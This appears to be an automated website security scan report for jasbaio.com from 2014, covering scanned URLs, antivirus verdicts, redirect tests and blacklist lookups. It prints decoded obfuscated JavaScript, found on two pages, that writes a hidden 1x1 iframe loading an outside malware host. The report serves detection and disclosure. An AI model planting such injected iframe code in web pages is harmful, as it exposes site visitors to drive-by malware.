Scanned pages/files
Request | Server response | Status |
http://jasbaio.com/ | 200 OK Content-Length: 14189 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script:
document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
/*** called setTimeout with document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');, 190 */
<iframe width=1 height=1 border=0 frameborder=0 src='http://tapiroten.info/lin.cgi?jzo'></iframe>
Antivirus reports:
http://jasbaio.com/index.html | 200 OK Content-Length: 14189 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script:
document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
/*** called setTimeout with document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');, 190 */
<iframe width=1 height=1 border=0 frameborder=0 src='http://tapiroten.info/lin.cgi?jzo'></iframe>
Antivirus reports:
http://jasbaio.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://jasbaio.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jasbaio.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 31 Mar 2014 00:04:59 GMT
Accept-Ranges: bytes
Age: 0
ETag: "376d-4759c5ca6ad43"
Server: Apache/2
Content-Length: 14189
Content-Type: text/html
Expires: Mon, 31 Mar 2014 01:04:59 GMT
Last-Modified: Sat, 10 Oct 2009 22:38:56 GMT
...14189 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jasbaio.com
Referer: http://www.google.com/search?q=jasbaio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jasbaio.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jasbaio.com/
Result: jasbaio.com is not infected or malware details are not published yet.